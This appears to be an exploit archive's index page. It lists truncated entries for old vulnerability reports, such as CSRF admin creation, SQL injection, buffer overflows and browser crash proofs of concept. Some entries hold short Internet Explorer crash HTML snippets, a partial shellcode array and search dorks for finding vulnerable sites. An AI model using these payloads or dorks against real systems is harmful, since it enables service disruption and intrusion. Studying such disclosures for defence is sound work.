InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)

InverseFlow 2.4 - Cross-Site Request Forgery Add Admin + Exploit Title: InverseFlow v2.4 CSRF Vulnerabilities Add Admin User + Version : 2.4 + Author : EjRaM HaCkEr + Contact : m2z9.cn + Dork : inurl:"ticket.php?cmd=lost" + Software Link : http://asria.info/download/script/inverseflow.zip...

Internet Explorer6 DOS(2011-6-7)

No description provided by source. html body onload=”location.reload” script function Demo var a = document.createElement‘table’; var b = document.createElement‘frameset’; a.appendChildb; Demo; /script /body /html http://www.huimaozi.net/?p=139...

Mozilla Firefox (all) Crash Handler Vulnerabilities

Exploit for windows platform in category dos / poc =============================================================================== Title : Mozilla Firefox all Crash Handler Vulnerabilities Author : KedAns-Dz E-mail : email protected Home : HMD/AM 30008/04300 - Algeria -00213555248701 Twitter :...

Mozilla Firefox 3.6 - URL Spoofing

Tested on: Windows XP SP2/3 Code : You can trick a user into accessing a malicious website by using the following exploit The first link would be the malicious one. http://www.yahoo.com...

Microsoft Internet Explorer 8.0.7100.0 - Simple HTML Remote Crash (PoC)

Microsoft Internet Explorer 8.0.7100.0 - Simple HTML Remote Crash PoC Veryfied with IE8.0.7100.0 on W7 x64 RC. Any comments reaseon? dangerous? ... are welcome. schnuddelbuddel milw0rm.com 2009-08-05...

MW6 Barcode ActiveX (Barcode.dll) Reamote Heap Overflow PoC

No description provided by source. html ----------------------------------------------------------- br/ Author : Houssamix br/ ----------------------------------------------------------- br/ MW6 Barcode ActiveX Barcode.dll Reamote Heap Overflow Poc br/...

1Book Guestbook Script Code Execution Vulnerability

Exploit for unknown platform in category web applications =================================================== 1Book Guestbook Script Code Execution Vulnerability =================================================== ========================================================= =============== JIKI TEAM...

1Book Guestbook Script 1.0.1 - Code Execution

1Book Guestbook Script 1.0.1 - Code Execution ========================================================= =============== JIKI TEAM Maroc And YameN =============== ========================================================= Author : jiko email : [email protected] Home : www.no-back.org &...

Snitz2000 SQL Injection: A user can gain admin level

WwW.BugReport.ir AmnPardaz Security Research & Penetration Testing Group Title: A user can gain admin level in snitz 2000 by SQL Injection vendor: http://forum.snitz.com/ Googling: "Powered by Snitz" 2,440,000 victims Last bug report in 2007-02-16 with 4692 visitors Exploit: Available Fix...

snitz-sql.txt

WwW.BugReport.IR AmnPardaz Security Research & Penetration Testing Group Title: A user can gain admin level in snitz 2000 by SQL Injection vendor: http://forum.snitz.com/ Googling: "Powered by Snitz" 2,440,000 victims Last bug report in 2007-02-16 with 4692 visitors Exploit: Available Fix...

skyportal-multi.txt

WwW.BugReport.ir BugReport Security Research & Penetration Testing Group Title: Sky Portal Multiple SQL Injection Vulnerabilities Vendor: http://skyportal.net Exploitation: Remote with browser Fix Available: Patched In Last Version In Vendor Leaders : Shahin Ramezany & Sorush Dalili Team Members:...

skyportal vrc6 - Multiple Vulnerabilities

skyportal vrc6 - Multiple Vulnerabilities WwW.BugReport.ir BugReport Security Research & Penetration Testing Group Title: Sky Portal Multiple SQL Injection Vulnerabilities Vendor: http://skyportal.net Exploitation: Remote with browser Fix Available: Patched In Last Version In Vendor Leaders :...

skyportal vrc6 - Multiple Vulnerabilities

WwW.BugReport.ir BugReport Security Research & Penetration Testing Group Title: Sky Portal Multiple SQL Injection Vulnerabilities Vendor: http://skyportal.net Exploitation: Remote with browser Fix Available: Patched In Last Version In Vendor Leaders : Shahin Ramezany & Sorush Dalili Team Members:...

phpnuketopsites-inject.txt

Html Exploit: PhpNuke add-on MS TopSites Edit Exploit And Html Injection SiteNameTitle sname not Target it must be changed in the source Username uname Url Email i...

ppstream-overflow.txt

// author: dummy // written by [email protected] 2007 define CRTSECURENODEPRECATE include include const unsigned char shellcode174 = 0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A, 0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00,...

联想Automated Solutions ActiveX控件多个安全漏洞

BUGTRAQ ID: 25311 CVECAN ID: CVE-2007-2928,CVE-2007-2929,CVE-2007-2240 Automated Solutions是联想和IBM电脑中所安装的ActiveX工具软件包。 Automated Solutions的ActiveX控件实现上存在格式串处理漏洞，远程攻击者可能利用此漏洞控制用户系统。 Automated...

Gran Paradiso 3.0a3 - Non-Existent applet Denial of Service

Gran Paradiso 3.0a3 - Non-Existent applet Denial of Service milw0rm.com 2007-04-11...

Mybb Change Password Vulnerability

Hello,, Mybb Change Password Vulnerability Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] If You Can Use the debug mode you will be able to change the password for and user by knowing the registered email address Enter the...

KDE libkhtml 3.5 4.2.0 - Unhandled HTML Parse Exception

KDE libkhtml 3.5 4.2.0 - Unhandled HTML Parse Exception ::count from /usr/kde/3.5/lib/libkhtml.so.4 2 0xb64b0550 in TestFunctionImp::TestFunctionImp from /usr/kde/3.5/lib/libkhtml.so.4 3 0xb64b43a2 in TestFunctionImp::TestFunctionImp from /usr/kde/3.5/lib/libkhtml.so.4 4 0xb63329d5 in...

Microsoft Internet Explorer Frame Src拒绝服务漏洞

Microsoft Internet Explorer是一款流行的WEB浏览器。 Microsoft Internet Explorer处理Frame src存在问题，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 提交类似如下的页面，诱使用户打开，可导致应用程序崩溃： html frameset rows="1000%" frame src="?" /html Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 - Microsoft Windows 2000 Advanced Server SP2...